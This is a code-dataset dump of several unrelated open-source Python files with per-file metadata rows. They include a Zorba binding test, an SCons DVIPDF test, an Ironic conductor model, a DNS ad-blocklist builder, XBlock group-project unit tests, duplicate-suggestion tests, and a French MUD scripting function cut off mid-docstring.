self.__fixedIndex = zeroableIndex
def setStretchFactor(self, index: int, stretchFactor: int):
self.qwidget.setStretchFactor(index, stretchFactor)
| gpl-2.0 | -2,767,218,321,864,412,000 | 31.985185 | 77 | 0.608803 | false |
cezarfx/zorba | swig/python/tests/test04.py | 1 | 1089 | # Copyright 2006-2011 The FLWOR Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '@pythonPath@')
import zorba_api
def test(zorba):
#Read and write result
print 'Executing: test04.xq'
f = open('test04.xq', 'r')
lines = f.read()
f.close()
xquery = zorba.compileQuery(lines)
result = xquery.execute()
print result
return
store = zorba_api.InMemoryStore_getInstance()
zorba = zorba_api.Zorba_getInstance(store)
print "Running: XQuery execute"
test(zorba)
print "Success"
zorba.shutdown()
zorba_api.InMemoryStore_shutdown(store)
| apache-2.0 | -5,153,413,378,839,610,000 | 24.928571 | 74 | 0.741965 | false |
EmanueleCannizzaro/scons | test/DVIPDF/makeindex.py | 1 | 2303 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/DVIPDF/makeindex.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import TestSCons
test = TestSCons.TestSCons()
dvipdf = test.where_is('dvipdf')
if not dvipdf:
test.skip_test('Could not find dvipdf; skipping test(s).\n')
tex = test.where_is('tex')
if not tex:
test.skip_test('Could not find tex; skipping test(s).\n')
latex = test.where_is('latex')
if not latex:
test.skip_test('Could not find latex; skipping test(s).\n')
test.write('SConstruct', """
import os
env = Environment(ENV = { 'PATH' : os.environ['PATH'] })
dvipdf = env.Dictionary('DVIPDF')
env.PDF(target = 'foo.pdf',
source = env.DVI(target = 'foo.dvi', source = 'foo.tex'))
""")
test.write('foo.tex', r"""
\documentclass{article}
\usepackage{makeidx}
\makeindex
\begin{document}
\section{Test 1}
I would like to \index{index} this.
\section{test 2}
I'll index \index{this} as well.
\printindex
\end{document}
""")
test.run(arguments = 'foo.pdf', stderr = None)
test.must_exist(test.workpath('foo.pdf'))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -5,945,060,233,082,140,000 | 26.416667 | 98 | 0.723404 | false |
varunarya10/ironic | ironic/objects/conductor.py | 2 | 2328 | # coding=utf-8
#
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ironic.db import api as db_api
from ironic.objects import base
from ironic.objects import utils
class Conductor(base.IronicObject):
dbapi = db_api.get_instance()
fields = {
'id': int,
'drivers': utils.list_or_none,
'hostname': str,
}
@staticmethod
def _from_db_object(conductor, db_obj):
"""Converts a database entity to a formal object."""
for field in conductor.fields:
conductor[field] = db_obj[field]
conductor.obj_reset_changes()
return conductor
@base.remotable_classmethod
def get_by_hostname(cls, context, hostname):
"""Get a Conductor record by its hostname.
:param hostname: the hostname on which a Conductor is running
:returns: a :class:`Conductor` object.
"""
db_obj = cls.dbapi.get_conductor(hostname)
return Conductor._from_db_object(cls(), db_obj)
def save(self, context):
"""Save is not supported by Conductor objects."""
raise NotImplementedError(
_('Cannot update a conductor record directly.'))
@base.remotable
def refresh(self, context):
current = self.__class__.get_by_hostname(context,
hostname=self.hostname)
for field in self.fields:
if (hasattr(self, base.get_attrname(field)) and
self[field] != current[field]):
self[field] = current[field]
@base.remotable
def touch(self, context):
"""Touch this conductor's DB record, marking it as up-to-date."""
self.dbapi.touch_conductor(self.hostname)
| apache-2.0 | -5,147,548,087,885,553,000 | 33.235294 | 78 | 0.631014 | false |
ragibkl/blackhole | website/named/models.py | 1 | 1529 | from django.db import models
from django.template import loader
import requests
class AdSource(models.Model):
name = models.CharField(max_length=10)
get_url = models.URLField()
def fetch_ad_domains(self):
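        # The upstream list is expected in hosts-file form, e.g.
        # "0.0.0.0 ads.example.com"; lines starting with '#' are comments.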
url = self.get_url
response = requests.get(url)
if response.status_code == 200:
response_list = str(response.content, 'UTF-8')\
.replace('\r','').split('\n')
ad_list = []
for line in response_list:
a = line.replace('\t', ' ').split(' ')
                if len(a) > 1 and a[0] in ['0.0.0.0', '127.0.0.1'] and a[1] not in ('', 'localhost') and a[1][-1] != '.':
ad_list.append(a[1].lower())
elif len(a) > 1 and len(a[1]) > 1 and a[1][-1] == '.':
print('Rejected : {}'.format(line))
ad_domains = self.ad_domains.all()
for ad_domain in ad_domains:
ad_domain.delete()
for ad_domain in ad_list:
print(ad_domain)
self.ad_domains.create(domain=ad_domain)
class AdDomain(models.Model):
domain = models.CharField(max_length=100)
source = models.ForeignKey(AdSource, related_name='ad_domains')
@classmethod
def get_ad_blacklist(cls):
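        # Render the de-duplicated domain list through the named/badlist.txt
        # template, producing the blacklist configuration for the DNS server.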
ad_list = cls.objects.values('domain').distinct()
string = loader.render_to_string('named/badlist.txt', {
'blackhole': 'dns1.bancuh.com',
'ad_list': ad_list
})
return string
| gpl-3.0 | -9,100,672,480,641,761,000 | 31.531915 | 122 | 0.53172 | false |
open-craft/xblock-group-project-v2 | tests/unit/test_stage_components.py | 1 | 24794 | import json
import os
from datetime import datetime
from unittest import TestCase
from xml.etree import ElementTree
import ddt
import mock
import pytz
from freezegun import freeze_time
from xblock.field_data import DictFieldData
from xblock.fields import ScopeIds
from xblock.runtime import Runtime
from xblock.validation import ValidationMessage
from group_project_v2 import messages
from group_project_v2.group_project import GroupActivityXBlock
from group_project_v2.project_api import TypedProjectAPI
from group_project_v2.project_api.dtos import WorkgroupDetails
from group_project_v2.project_navigator import ProjectNavigatorViewXBlockBase
from group_project_v2.stage import BaseGroupActivityStage
from group_project_v2.stage_components import (
GroupProjectGradeEvaluationDisplayXBlock,
GroupProjectReviewQuestionXBlock,
GroupProjectSubmissionXBlock,
GroupProjectTeamEvaluationDisplayXBlock,
StaticContentBaseXBlock,
)
from group_project_v2.upload_file import UploadFile
from tests.utils import TestWithPatchesMixin, make_api_error, make_question
from tests.utils import make_review_item as mri
class StageComponentXBlockTestBase(TestCase, TestWithPatchesMixin):
block_to_test = None
def setUp(self):
super(StageComponentXBlockTestBase, self).setUp()
services_mocks = {
"i18n": mock.Mock(ugettext=lambda string: string),
"notifications": mock.Mock()
}
self.runtime_mock = mock.create_autospec(Runtime)
self.runtime_mock.service = lambda _, service_id: services_mocks.get(service_id)
self.stage_mock = mock.create_autospec(BaseGroupActivityStage)
# pylint: disable=not-callable
self.block = self.block_to_test(self.runtime_mock, field_data=DictFieldData({}), scope_ids=mock.Mock())
self.make_patch(self.block_to_test, 'stage', mock.PropertyMock(return_value=self.stage_mock))
def _assert_empty_fragment(self, fragment): # pylint: disable=no-self-use
self.assertEqual(fragment.content, u'')
self.assertEqual(fragment.resources, [])
class TestableStaticContentXBlock(StaticContentBaseXBlock):
TARGET_PROJECT_NAVIGATOR_VIEW = 'some-pn-view'
TEXT_TEMPLATE = u"Static content for {activity_name}"
@ddt.ddt
class TestStaticContentBaseXBlockMixin(StageComponentXBlockTestBase):
block_to_test = TestableStaticContentXBlock
def _set_up_navigator(self, activity_name='Activity 1'):
stage = self.stage_mock
activity = mock.create_autospec(GroupActivityXBlock)
activity.display_name = activity_name
stage.activity = activity
nav = mock.Mock()
stage.activity.project.navigator = nav
return nav
def test_student_view_no_path_to_navigator(self):
self.stage_mock = None
self._assert_empty_fragment(self.block.student_view({}))
self.stage_mock = mock.create_autospec(BaseGroupActivityStage)
stage = self.stage_mock
stage.activity = None
self._assert_empty_fragment(self.block.student_view({}))
stage.activity = mock.Mock()
stage.activity.project = None
self._assert_empty_fragment(self.block.student_view({}))
stage.activity.project = mock.Mock()
stage.activity.project.navigator = None
self._assert_empty_fragment(self.block.student_view({}))
def test_student_view_no_target_block(self):
navigator_mock = self._set_up_navigator()
navigator_mock.get_child_of_category = mock.Mock(return_value=None)
self._assert_empty_fragment(self.block.student_view({}))
navigator_mock.get_child_of_category.assert_called_once_with(self.block.TARGET_PROJECT_NAVIGATOR_VIEW)
@ddt.data(
({'additional': 'context'}, u"Rendered content", "activity 1"),
({'other': 'additional'}, u"Other content", "Activity 2"),
)
@ddt.unpack
def test_student_view_normal(self, additional_context, content, activity_name):
target_block = mock.Mock(spec=ProjectNavigatorViewXBlockBase)
target_block.icon = "I'm icon"
target_block.scope_ids = mock.create_autospec(spec=ScopeIds)
navigator_mock = self._set_up_navigator(activity_name)
navigator_mock.get_child_of_category.return_value = target_block
with mock.patch('group_project_v2.stage_components.loader.render_template') as patched_render_template, \
mock.patch('group_project_v2.stage_components.get_link_to_block') as patched_get_link_to_block:
patched_render_template.return_value = content
patched_get_link_to_block.return_value = "some link"
expected_context = {
'block': self.block,
'block_link': 'some link',
'block_text': TestableStaticContentXBlock.TEXT_TEMPLATE.format(activity_name=activity_name),
'target_block_id': str(target_block.scope_ids.usage_id),
'view_icon': target_block.icon
}
expected_context.update(additional_context)
fragment = self.block.student_view(additional_context)
self.assertEqual(fragment.content, content)
patched_get_link_to_block.assert_called_once_with(target_block)
patched_render_template.assert_called_once_with(StaticContentBaseXBlock.TEMPLATE_PATH, expected_context)
@ddt.ddt
class TestGroupProjectSubmissionXBlock(StageComponentXBlockTestBase):
block_to_test = GroupProjectSubmissionXBlock
group_id = 152
user_id = "student_1"
course_id = "a course"
def _make_file(self): # pylint:disable=no-self-use
return open(os.path.join(os.path.split(__file__)[0], "../resources/", 'image.png'), 'rb')
def setUp(self):
super(TestGroupProjectSubmissionXBlock, self).setUp()
self.project_api_mock = mock.create_autospec(TypedProjectAPI)
self.make_patch(self.block_to_test, 'project_api', mock.PropertyMock(return_value=self.project_api_mock))
user_details = mock.Mock(user_label='Test label')
self.block_to_test.project_api.get_user_details = mock.Mock(
spec=TypedProjectAPI.get_user_details, return_value=user_details
)
self.project_api_mock.get_latest_workgroup_submissions_by_id = mock.Mock(return_value={})
self.stage_mock.available_now = True
self.stage_mock.activity = mock.Mock()
self.stage_mock.activity.user_id = self.user_id
self.stage_mock.activity.workgroup = WorkgroupDetails(id=self.group_id)
self.stage_mock.activity.course_id = self.course_id
@ddt.data(1, 'qwe', 'upload 1')
def test_upload(self, upload_id):
upload_datetime = datetime(2015, 11, 19, 22, 54, 13, tzinfo=pytz.UTC)
self.block.upload_id = upload_id
self.project_api_mock.get_latest_workgroup_submissions_by_id.return_value = {
upload_id: {
"document_url": 'https://dummy.s3.amazonaws.com/1/123123123/some_filename',
"document_filename": 'some_filename',
"modified": upload_datetime.strftime('%Y-%m-%dT%H:%M:%SZ'),
"user_details": {"id": 1, "name": 'qwe'}
}
}
with mock.patch('group_project_v2.stage_components.format_date') as patched_format_date:
patched_format_date.return_value = "Aug 22"
upload = self.block.upload
self.project_api_mock.get_latest_workgroup_submissions_by_id.assert_called_once_with(self.group_id)
patched_format_date.assert_called_once_with(upload_datetime)
self.assertEqual(upload.location, 'https://dummy.s3.amazonaws.com/1/123123123/some_filename')
self.assertEqual(upload.file_name, 'some_filename')
self.assertEqual(upload.submission_date, 'Aug 22')
self.assertEqual(upload.user_details, {"id": 1, "name": 'qwe'})
def test_no_upload(self):
self.block.upload_id = 150
self.project_api_mock.get_latest_workgroup_submissions_by_id.return_value = {1: {}, 2: {}}
self.assertIsNone(self.block.upload)
def test_upload_submission_stage_is_not_available(self):
self.stage_mock.available_now = False
self.stage_mock.STAGE_ACTION = 'something'
response = self.block.upload_submission(mock.Mock())
self.assertEqual(response.status_code, 422)
def test_upload_submission_stage_is_not_group_member(self):
self.stage_mock.is_group_member = False
self.stage_mock.is_admin_grader = False
response = self.block.upload_submission(mock.Mock())
self.assertEqual(response.status_code, 403)
@ddt.data(
(Exception("exception message"), 500),
(make_api_error(418, "other message"), 418),
(make_api_error(401, "yet another message"), 401),
)
@ddt.unpack
def test_upload_submission_persist_and_submit_file_raises(self, exception, expected_code):
upload_id = "upload_id"
request_mock = mock.Mock()
request_mock.params = {upload_id: mock.Mock()}
request_mock.params[upload_id].file = self._make_file()
self.block.upload_id = upload_id
with mock.patch.object(self.block, 'persist_and_submit_file') as patched_persist_and_submit_file:
patched_persist_and_submit_file.side_effect = exception
response = self.block.upload_submission(request_mock)
self.assertEqual(response.status_code, expected_code)
response_body = json.loads(response.text)
self.assertEqual(response_body['title'], messages.FAILED_UPLOAD_TITLE)
self.assertEqual(
response_body['message'],
messages.FAILED_UPLOAD_MESSAGE_TPL.format(error_goes_here=str(exception))
)
@ddt.data(
("sub1", "file.html", "new_stage_state1", False),
("sub2", "other_file.so", {"activity_id": 'A1', "stage_id": 'S1', 'state': 'complete'}, False),
("sub1", "file_ta.so", {"activity_id": 'A1', "stage_id": 'S1', 'state': 'complete'}, True),
("sub2", "other_file_ta.so", {"activity_id": 'A1', "stage_id": 'S1', 'state': 'complete'}, True),
)
@ddt.unpack
@freeze_time("2015-08-01")
def test_upload_submission_success_scenario(self, submission_id, file_url, stage_state, is_admin_grader):
upload_id = "upload_id"
self.stage_mock.is_admin_grader = is_admin_grader
self.stage_mock.is_group_member = not is_admin_grader
request_mock = mock.Mock()
request_mock.params = {upload_id: mock.Mock()}
uploaded_file = self._make_file()
request_mock.params[upload_id].file = uploaded_file
self.block.upload_id = upload_id
self.stage_mock.get_new_stage_state_data = mock.Mock(return_value=stage_state)
self.stage_mock.check_submissions_and_mark_complete = mock.Mock()
expected_context = {
"user_id": self.user_id,
"group_id": self.group_id,
"project_api": self.project_api_mock,
"course_id": self.course_id
}
with mock.patch.object(self.block, 'persist_and_submit_file') as patched_persist_and_submit_file:
uploaded_file_mock = mock.Mock()
uploaded_file_mock.submission_id = submission_id
uploaded_file_mock.file_url = file_url
patched_persist_and_submit_file.return_value = uploaded_file_mock
response = self.block.upload_submission(request_mock)
self.assertEqual(response.status_code, 200)
response_payload = json.loads(response.text)
self.assertEqual(response_payload['title'], messages.SUCCESSFUL_UPLOAD_TITLE)
self.assertEqual(response_payload["submissions"], {submission_id: file_url})
self.assertEqual(response_payload["new_stage_states"], [stage_state])
self.assertEqual(response_payload["user_label"], 'Test label')
self.assertEqual(response_payload["submission_date"], 'Aug 01')
self.stage_mock.check_submissions_and_mark_complete.assert_called_once_with()
patched_persist_and_submit_file.assert_called_once_with(
self.stage_mock.activity, expected_context, uploaded_file
)
def test_persist_and_submit_file_propagates_exceptions(self):
context_mock = mock.Mock()
uploaded_file = self._make_file()
with mock.patch('group_project_v2.stage_components.UploadFile') as upload_file_class_mock:
upload_file_mock = mock.create_autospec(UploadFile)
upload_file_mock.save_file = mock.Mock(side_effect=Exception("some error"))
upload_file_mock.file = mock.Mock()
upload_file_mock.file.name = 'file_name'
upload_file_class_mock.return_value = upload_file_mock
with self.assertRaises(Exception) as raises_cm:
self.block.persist_and_submit_file(self.stage_mock.activity, context_mock, uploaded_file)
exception = raises_cm.exception
expected_message = "Error storing file {} - {}".format(upload_file_mock.file.name, "some error")
self.assertEqual(exception.message, expected_message)
upload_file_mock.save_file.side_effect = lambda: 1
upload_file_mock.submit = mock.Mock(side_effect=Exception("other error"))
with self.assertRaises(Exception) as raises_cm:
self.block.persist_and_submit_file(self.stage_mock.activity, context_mock, uploaded_file)
exception = raises_cm.exception
expected_message = "Error recording file information {} - {}".format(
upload_file_mock.file.name, "other error"
)
self.assertEqual(exception.message, expected_message)
@ddt.data(1, "upload 12", "iddqd")
def test_persist_and_submit_file_success_path(self, upload_id):
self.block.upload_id = upload_id
self.stage_mock.activity.content_id = 'content_id 12'
self.stage_mock.fire_file_upload_notification = mock.Mock()
context_mock = mock.Mock()
uploaded_file = self._make_file()
self.runtime_mock.publish = mock.Mock()
with mock.patch('group_project_v2.stage_components.UploadFile') as upload_file_class_mock:
upload_file_mock = mock.create_autospec(UploadFile)
upload_file_mock.submission_id = '12345'
upload_file_mock.file = mock.Mock()
upload_file_mock.file.name = 'file_name'
upload_file_class_mock.return_value = upload_file_mock
result = self.block.persist_and_submit_file(self.stage_mock.activity, context_mock, uploaded_file)
self.assertEqual(result, upload_file_mock)
upload_file_class_mock.assert_called_once_with(uploaded_file, upload_id, context_mock)
upload_file_mock.save_file.assert_called_once_with()
upload_file_mock.submit.assert_called_once_with()
self.runtime_mock.publish.assert_called_once_with(
self.block,
self.block_to_test.SUBMISSION_RECEIVED_EVENT,
{
"submission_id": '12345',
"filename": 'file_name',
"content_id": 'content_id 12',
"group_id": self.group_id,
"user_id": self.user_id,
}
)
self.stage_mock.fire_file_upload_notification.assert_called_with(
self.runtime_mock.service(self, 'notifications')
)
@ddt.ddt
class TestGroupProjectReviewQuestionXBlock(StageComponentXBlockTestBase):
block_to_test = GroupProjectReviewQuestionXBlock
def test_render_content_bad_content(self):
self.block.question_content = "imparsable as XML"
self.assertEqual(self.block.render_content(), "")
@ddt.data(
("<input type='text'/>", False, False, {'answer', 'editable'}),
("<textarea class='initial_class'/>", False, False, {'answer', 'editable', 'initial_class'}),
("<input type='text'/>", True, False, {'answer', 'editable', 'side'}),
("<input type='text'/>", False, True, {'answer'}),
)
@ddt.unpack
def test_render_content_node_content(self, question_content, single_line, closed, expected_classes):
self.block.question_content = question_content
self.block.single_line = single_line
self.stage_mock.is_closed = closed
with mock.patch('group_project_v2.stage_components.outer_html') as patched_outer_html:
expected_response = "some rendered content"
patched_outer_html.return_value = expected_response
response = self.block.render_content()
self.assertEqual(response, expected_response)
self.assertEqual(len(patched_outer_html.call_args_list), 1) # essentially "called once with any attributes"
call_args, call_kwargs = patched_outer_html.call_args
self.assertEqual(call_kwargs, {})
self.assertEqual(len(call_args), 1)
node_to_render = call_args[0]
self.assertIsInstance(node_to_render, ElementTree.Element)
self.assertEqual(node_to_render.get('id'), self.block.question_id)
self.assertEqual(node_to_render.get('name'), self.block.question_id)
self.assertEqual(set(node_to_render.get('class').split(' ')), expected_classes)
self.assertEqual(node_to_render.get('disabled', None), 'disabled' if closed else None)
class CommonFeedbackDisplayStageTests(object):
def setUp(self):
super(CommonFeedbackDisplayStageTests, self).setUp()
self.activity_mock = mock.create_autospec(GroupActivityXBlock)
self.stage_mock.activity = self.activity_mock
self.project_api_mock = mock.Mock(spec=TypedProjectAPI)
self.make_patch(self.block_to_test, 'project_api', mock.PropertyMock(return_value=self.project_api_mock))
self.block.question_id = "q1"
@staticmethod
def _print_messages(validation):
for message in validation.messages:
print(message.text)
def test_validate_no_question_id_sets_error_message(self):
self.block.question_id = None
try:
validation = self.block.validate()
self.assertEqual(len(validation.messages), 1)
self.assertEqual(validation.messages[0].type, ValidationMessage.ERROR)
self.assertEqual(validation.messages[0].text, self.block.NO_QUESTION_SELECTED)
except AssertionError:
print(self._print_messages(validation))
raise
def test_validate_question_not_found_sets_error_message(self):
with mock.patch.object(self.block_to_test, 'question', mock.PropertyMock(return_value=None)):
try:
validation = self.block.validate()
self.assertEqual(len(validation.messages), 1)
self.assertEqual(validation.messages[0].type, ValidationMessage.ERROR)
self.assertEqual(validation.messages[0].text, self.block.QUESTION_NOT_FOUND)
except AssertionError:
print(self._print_messages(validation))
raise
def test_has_question_passes_validation(self):
question_mock = mock.create_autospec(GroupProjectReviewQuestionXBlock)
with mock.patch.object(self.block_to_test, 'question', mock.PropertyMock(return_value=question_mock)):
try:
validation = self.block.validate()
self.assertEqual(len(validation.messages), 0)
except AssertionError:
print(self._print_messages(validation))
raise
def test_question_property_no_questions(self):
with mock.patch.object(self.block_to_test, 'activity_questions', mock.PropertyMock(return_value=[])):
self.assertIsNone(self.block.question)
def test_question_property_no_matching_questions(self):
self.block.question_id = 'q1'
questions = [make_question('123', '123'), make_question('456', '456')]
with mock.patch.object(self.block_to_test, 'activity_questions', mock.PropertyMock(return_value=questions)):
self.assertIsNone(self.block.question)
def test_question_property_one_matching_question(self):
self.block.question_id = '456'
questions = [make_question('123', '123'), make_question('456', '456')]
with mock.patch.object(self.block_to_test, 'activity_questions', mock.PropertyMock(return_value=questions)):
self.assertEqual(self.block.question, questions[1])
def test_question_property_multiple_matching_questions(self):
self.block.question_id = '123'
questions = [make_question('123', '123'), make_question('123', '123')]
with mock.patch.object(self.block_to_test, 'activity_questions', mock.PropertyMock(return_value=questions)), \
self.assertRaises(ValueError):
_ = self.block.question # pylint:disable=invalid-name
def test_question_ids_values_provider(self):
questions = [make_question('123', 'Title 1'), make_question('456', 'Title 2'), make_question('789', 'Title 3')]
with mock.patch.object(self.block_to_test, 'activity_questions', mock.PropertyMock(return_value=questions)):
values = self.block.question_ids_values_provider()
self.assertEqual(values, [
{'display_name': u'--- Not selected ---', 'value': None},
{"display_name": 'Title 1', "value": '123'},
{"display_name": 'Title 2', "value": '456'},
{"display_name": 'Title 3', "value": '789'}
])
@ddt.ddt
class TestGroupProjectTeamEvaluationDisplayXBlock(CommonFeedbackDisplayStageTests, StageComponentXBlockTestBase):
block_to_test = GroupProjectTeamEvaluationDisplayXBlock
# pylint: disable=too-many-arguments
@ddt.data(
(1, 2, 'content-1', 'q1', [mri(1, "q1"), mri(2, "q1")], [mri(1, "q1"), mri(2, "q1")]),
(3, 9, 'content-2', 'q2', [mri(1, "q1"), mri(2, "q1")], []),
(7, 15, 'content-3', 'q1', [mri(1, "q1"), mri(1, "q2")], [mri(1, "q1")]),
(7, 15, 'content-3', 'q2', [mri(1, "q1"), mri(1, "q2")], [mri(1, "q2")]),
)
@ddt.unpack
def test_get_feedback(self, user_id, group_id, content_id, question_id, feedback_items, expected_result):
self.project_api_mock.get_user_peer_review_items = mock.Mock(return_value=feedback_items)
self.stage_mock.activity_content_id = content_id
self.block.question_id = question_id
with mock.patch.object(self.block_to_test, 'user_id', mock.PropertyMock(return_value=user_id)), \
mock.patch.object(self.block_to_test, 'group_id', mock.PropertyMock(return_value=group_id)):
result = self.block.get_feedback()
self.project_api_mock.get_user_peer_review_items.assert_called_once_with(
user_id, group_id, content_id
)
self.assertEqual(result, expected_result)
def test_activity_questions(self):
self.activity_mock.team_evaluation_questions = [1, 2, 3]
self.activity_mock.peer_review_questions = [4, 5, 6]
self.assertEqual(self.block.activity_questions, [1, 2, 3])
@ddt.ddt
class TestGroupProjectGradeEvaluationDisplayXBlock(CommonFeedbackDisplayStageTests, StageComponentXBlockTestBase):
block_to_test = GroupProjectGradeEvaluationDisplayXBlock
@ddt.data(
(2, 'content-1', 'q1', [mri(1, "q1"), mri(2, "q1")], [mri(1, "q1"), mri(2, "q1")]),
(9, 'content-2', 'q2', [mri(1, "q1"), mri(2, "q1")], []),
(15, 'content-3', 'q1', [mri(1, "q1"), mri(1, "q2")], [mri(1, "q1")]),
(15, 'content-3', 'q2', [mri(1, "q1"), mri(1, "q2")], [mri(1, "q2")]),
)
@ddt.unpack
def test_get_feedback(self, group_id, content_id, question_id, feedback_items, expected_result):
self.project_api_mock.get_workgroup_review_items_for_group = mock.Mock(return_value=feedback_items)
self.stage_mock.activity_content_id = content_id
self.block.question_id = question_id
with mock.patch.object(self.block_to_test, 'group_id', mock.PropertyMock(return_value=group_id)):
result = self.block.get_feedback()
self.project_api_mock.get_workgroup_review_items_for_group.assert_called_once_with(group_id, content_id)
self.assertEqual(result, expected_result)
def test_activity_questions(self):
self.activity_mock.team_evaluation_questions = [1, 2, 3]
self.activity_mock.peer_review_questions = [4, 5, 6]
self.assertEqual(self.block.activity_questions, [4, 5, 6])
| agpl-3.0 | -2,898,909,224,324,588,000 | 45.257463 | 120 | 0.64681 | false |
DemocracyClub/yournextrepresentative | ynr/apps/duplicates/tests/test_models.py | 1 | 3194 | from django.db import IntegrityError
from django.test import TestCase
from candidates.tests.auth import TestUserMixin
from duplicates.models import DuplicateSuggestion
from people.tests.factories import PersonFactory
class TestDuplicateSuggestion(TestUserMixin, TestCase):
def setUp(self):
self.people = PersonFactory.create_batch(10)
self.person_1 = self.people[0]
self.person_2 = self.people[1]
def test_queryset_finds_bidirectional_duplicates(self):
"""
Test that the `for_person` queryset finds duplicates in each direction.
"""
DuplicateSuggestion.objects.create(
person=self.person_1, other_person=self.person_2, user=self.user
)
self.assertEqual(
DuplicateSuggestion.objects.for_person(self.person_1).count(), 1
)
self.assertEqual(
DuplicateSuggestion.objects.for_person(self.person_2).count(), 1
)
def test_mark_as_not_duplicate(self):
DuplicateSuggestion.objects.create(
person=self.person_1,
other_person=self.person_2,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
self.assertEqual(DuplicateSuggestion.not_duplicate.all().count(), 1)
self.assertTrue(
DuplicateSuggestion.objects.marked_as_not_duplicate(
self.person_1, self.person_2
)
)
self.assertTrue(
DuplicateSuggestion.objects.marked_as_not_duplicate(
self.person_2, self.person_1
)
)
def test_not_duplicate_duplicates_create_method(self):
"""
Make sure we can't make a duplicate duplicate suggestion using create()
"""
DuplicateSuggestion.objects.create(
person=self.person_1,
other_person=self.person_2,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
with self.assertRaises(IntegrityError):
DuplicateSuggestion.objects.create(
person=self.person_2,
other_person=self.person_1,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
def test_not_duplicate_duplicates_upsert(self):
DuplicateSuggestion.objects.create(
person=self.person_1,
other_person=self.person_2,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
self.assertEqual(DuplicateSuggestion.objects.count(), 1)
DuplicateSuggestion.objects.update_or_create(
person=self.person_2,
other_person=self.person_1,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
self.assertEqual(DuplicateSuggestion.objects.count(), 1)
DuplicateSuggestion.objects.get_or_create(
person=self.person_2,
other_person=self.person_1,
user=self.user,
status=DuplicateSuggestion.STATUS.not_duplicate,
)
self.assertEqual(DuplicateSuggestion.objects.count(), 1)
| agpl-3.0 | -2,256,743,429,866,708,500 | 34.488889 | 79 | 0.622104 | false |
vlegoff/tsunami | src/primaires/scripting/fonctions/ent_alea.py | 1 | 2666 | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant la fonction ent_alea."""
from random import randint, random, choice
from fractions import Fraction
from primaires.scripting.fonction import Fonction
class ClasseFonction(Fonction):
"""Retourne un entier aléatoire."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.ent_alea, "Fraction")
cls.ajouter_types(cls.ent_alea_pond, "Fraction", "Fraction")
@staticmethod
def ent_alea(max):
"""Retourne un entier aléatoire entre 1 et la valeur maximale précisée.
"""
return Fraction(randint(1, int(max)))
@staticmethod
def ent_alea_pond(max, pond):
"""Retourne un entier aléatoire entre 1 et la valeur maximale,
pondéré par la valeur précisée en deuxième argument.
Cette fonction est utile pour calculer des dégâts en fonction
d'un talent d'un personnage.
"""
